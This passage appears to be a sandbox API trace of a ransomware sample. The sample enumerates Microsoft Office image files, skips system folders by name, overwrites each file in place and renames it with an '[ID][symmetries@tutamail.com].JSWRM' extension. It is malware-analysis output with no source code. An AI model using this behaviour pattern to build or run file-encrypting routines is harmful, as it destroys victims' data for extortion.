out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\Shared16x16ImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\shared16x16imagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.164] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3896) returned 1 [0131.165] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.165] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xf30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xf30, lpOverlapped=0x0) returned 1 [0131.166] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.166] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xf30, lpOverlapped=0x0) returned 1 [0131.167] CloseHandle (hObject=0x314) returned 1 [0131.167] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\Shared16x16ImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\shared16x16imagesmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\Shared16x16ImagesMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\shared16x16imagesmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.168] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19758458, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19758458, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1977e6ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1963, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="Shared24x24Images.jpg", cAlternateFileName="SHARED~1.JPG")) returned 1 [0131.168] lstrcmpiW (lpString1="Shared24x24Images.jpg", lpString2=".") returned 1 [0131.168] lstrcmpiW (lpString1="Shared24x24Images.jpg", lpString2="..") returned 1 [0131.168] lstrcmpiW (lpString1="Shared24x24Images.jpg", lpString2="...") returned 1 [0131.168] lstrcmpiW (lpString1="Shared24x24Images.jpg", lpString2="windows") returned -1 [0131.168] lstrcmpiW (lpString1="Shared24x24Images.jpg", lpString2="recovery") returned 1 [0131.168] lstrcmpiW (lpString1="Shared24x24Images.jpg", lpString2="perflogs") returned 1 [0131.168] lstrcmpiW (lpString1="Shared24x24Images.jpg", lpString2="documents and settings") returned 1 [0131.168] lstrcmpiW (lpString1="Shared24x24Images.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.168] lstrcmpiW (lpString1="Shared24x24Images.jpg", lpString2="system volume information") returned -1 [0131.168] lstrcmpiW (lpString1="Shared24x24Images.jpg", lpString2="msocache") returned 1 [0131.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared24x24Images.jpg", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared24x24Images.jpg", cchWideChar=21, lpMultiByteStr=0x241380, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shared24x24Images.jpg", lpUsedDefaultChar=0x0) returned 21 [0131.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared24x24Images.jpg", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared24x24Images.jpg", cchWideChar=21, lpMultiByteStr=0x240fe8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shared24x24Images.jpg", lpUsedDefaultChar=0x0) returned 21 [0131.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\Shared24x24Images.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\shared24x24images.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.169] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=6499) returned 1 [0131.169] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.169] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0x1960, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0x1960, lpOverlapped=0x0) returned 1 [0131.171] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.171] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0x1960, lpOverlapped=0x0) returned 1 [0131.172] CloseHandle (hObject=0x314) returned 1 [0131.172] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\Shared24x24Images.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\shared24x24images.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\Shared24x24Images.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\shared24x24images.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.173] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1983d259, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1638, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="Shared24x24ImagesMask.bmp", cAlternateFileName="SHARED~2.BMP")) returned 1 [0131.173] lstrcmpiW (lpString1="Shared24x24ImagesMask.bmp", lpString2=".") returned 1 [0131.173] lstrcmpiW (lpString1="Shared24x24ImagesMask.bmp", lpString2="..") returned 1 [0131.173] lstrcmpiW (lpString1="Shared24x24ImagesMask.bmp", lpString2="...") returned 1 [0131.173] lstrcmpiW (lpString1="Shared24x24ImagesMask.bmp", lpString2="windows") returned -1 [0131.173] lstrcmpiW (lpString1="Shared24x24ImagesMask.bmp", lpString2="recovery") returned 1 [0131.173] lstrcmpiW (lpString1="Shared24x24ImagesMask.bmp", lpString2="perflogs") returned 1 [0131.173] lstrcmpiW (lpString1="Shared24x24ImagesMask.bmp", lpString2="documents and settings") returned 1 [0131.173] lstrcmpiW (lpString1="Shared24x24ImagesMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.173] lstrcmpiW (lpString1="Shared24x24ImagesMask.bmp", lpString2="system volume information") returned -1 [0131.173] lstrcmpiW (lpString1="Shared24x24ImagesMask.bmp", lpString2="msocache") returned 1 [0131.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared24x24ImagesMask.bmp", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared24x24ImagesMask.bmp", cchWideChar=25, lpMultiByteStr=0x240fe8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shared24x24ImagesMask.bmp", lpUsedDefaultChar=0x0) returned 25 [0131.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared24x24ImagesMask.bmp", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared24x24ImagesMask.bmp", cchWideChar=25, lpMultiByteStr=0x2411c8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shared24x24ImagesMask.bmp", lpUsedDefaultChar=0x0) returned 25 [0131.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\Shared24x24ImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\shared24x24imagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.174] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5688) returned 1 [0131.174] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.174] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0x1630, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0x1630, lpOverlapped=0x0) returned 1 [0131.180] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.180] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1630, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0x1630, lpOverlapped=0x0) returned 1 [0131.180] CloseHandle (hObject=0x314) returned 1 [0131.180] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\Shared24x24ImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\shared24x24imagesmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\Shared24x24ImagesMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\shared24x24imagesmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.181] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd14, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="STOPICON.JPG", cAlternateFileName="")) returned 1 [0131.181] lstrcmpiW (lpString1="STOPICON.JPG", lpString2=".") returned 1 [0131.181] lstrcmpiW (lpString1="STOPICON.JPG", lpString2="..") returned 1 [0131.181] lstrcmpiW (lpString1="STOPICON.JPG", lpString2="...") returned 1 [0131.181] lstrcmpiW (lpString1="STOPICON.JPG", lpString2="windows") returned -1 [0131.181] lstrcmpiW (lpString1="STOPICON.JPG", lpString2="recovery") returned 1 [0131.181] lstrcmpiW (lpString1="STOPICON.JPG", lpString2="perflogs") returned 1 [0131.181] lstrcmpiW (lpString1="STOPICON.JPG", lpString2="documents and settings") returned 1 [0131.181] lstrcmpiW (lpString1="STOPICON.JPG", lpString2="$RECYCLE.BIN") returned 1 [0131.181] lstrcmpiW (lpString1="STOPICON.JPG", lpString2="system volume information") returned -1 [0131.182] lstrcmpiW (lpString1="STOPICON.JPG", lpString2="msocache") returned 1 [0131.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STOPICON.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STOPICON.JPG", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STOPICON.JPG", lpUsedDefaultChar=0x0) returned 12 [0131.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STOPICON.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STOPICON.JPG", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STOPICON.JPG", lpUsedDefaultChar=0x0) returned 12 [0131.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\STOPICON.JPG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\stopicon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.183] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3348) returned 1 [0131.183] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.183] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xd10, lpOverlapped=0x0) returned 1 [0131.185] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.185] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xd10, lpOverlapped=0x0) returned 1 [0131.185] CloseHandle (hObject=0x314) returned 1 [0131.185] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\STOPICON.JPG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\stopicon.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\STOPICON.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\stopicon.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.187] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197cab56, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197cab56, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197cab56, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x838, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="StopIconMask.bmp", cAlternateFileName="STOPIC~1.BMP")) returned 1 [0131.187] lstrcmpiW (lpString1="StopIconMask.bmp", lpString2=".") returned 1 [0131.187] lstrcmpiW (lpString1="StopIconMask.bmp", lpString2="..") returned 1 [0131.187] lstrcmpiW (lpString1="StopIconMask.bmp", lpString2="...") returned 1 [0131.187] lstrcmpiW (lpString1="StopIconMask.bmp", lpString2="windows") returned -1 [0131.187] lstrcmpiW (lpString1="StopIconMask.bmp", lpString2="recovery") returned 1 [0131.187] lstrcmpiW (lpString1="StopIconMask.bmp", lpString2="perflogs") returned 1 [0131.187] lstrcmpiW (lpString1="StopIconMask.bmp", lpString2="documents and settings") returned 1 [0131.187] lstrcmpiW (lpString1="StopIconMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.187] lstrcmpiW (lpString1="StopIconMask.bmp", lpString2="system volume information") returned -1 [0131.187] lstrcmpiW (lpString1="StopIconMask.bmp", lpString2="msocache") returned 1 [0131.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StopIconMask.bmp", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StopIconMask.bmp", cchWideChar=16, lpMultiByteStr=0x2412b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StopIconMask.bmp", lpUsedDefaultChar=0x0) returned 16 [0131.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StopIconMask.bmp", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StopIconMask.bmp", cchWideChar=16, lpMultiByteStr=0x241268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StopIconMask.bmp", lpUsedDefaultChar=0x0) returned 16 [0131.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\StopIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\stopiconmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.188] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2104) returned 1 [0131.188] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.189] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x830, lpOverlapped=0x0) returned 1 [0131.191] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.191] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x830, lpOverlapped=0x0) returned 1 [0131.191] CloseHandle (hObject=0x314) returned 1 [0131.191] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\StopIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\stopiconmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\StopIconMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\stopiconmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.192] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197cab56, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197cab56, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197cab56, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf38, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="TaskbarIconImages256Colors.bmp", cAlternateFileName="TASKBA~2.BMP")) returned 1 [0131.192] lstrcmpiW (lpString1="TaskbarIconImages256Colors.bmp", lpString2=".") returned 1 [0131.192] lstrcmpiW (lpString1="TaskbarIconImages256Colors.bmp", lpString2="..") returned 1 [0131.192] lstrcmpiW (lpString1="TaskbarIconImages256Colors.bmp", lpString2="...") returned 1 [0131.192] lstrcmpiW (lpString1="TaskbarIconImages256Colors.bmp", lpString2="windows") returned -1 [0131.192] lstrcmpiW (lpString1="TaskbarIconImages256Colors.bmp", lpString2="recovery") returned 1 [0131.192] lstrcmpiW (lpString1="TaskbarIconImages256Colors.bmp", lpString2="perflogs") returned 1 [0131.192] lstrcmpiW (lpString1="TaskbarIconImages256Colors.bmp", lpString2="documents and settings") returned 1 [0131.192] lstrcmpiW (lpString1="TaskbarIconImages256Colors.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.192] lstrcmpiW (lpString1="TaskbarIconImages256Colors.bmp", lpString2="system volume information") returned 1 [0131.192] lstrcmpiW (lpString1="TaskbarIconImages256Colors.bmp", lpString2="msocache") returned 1 [0131.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TaskbarIconImages256Colors.bmp", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0131.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TaskbarIconImages256Colors.bmp", cchWideChar=30, lpMultiByteStr=0x241358, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TaskbarIconImages256Colors.bmp", lpUsedDefaultChar=0x0) returned 30 [0131.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TaskbarIconImages256Colors.bmp", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0131.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TaskbarIconImages256Colors.bmp", cchWideChar=30, lpMultiByteStr=0x241218, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TaskbarIconImages256Colors.bmp", lpUsedDefaultChar=0x0) returned 30 [0131.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\TaskbarIconImages256Colors.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\taskbariconimages256colors.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.193] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3896) returned 1 [0131.193] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 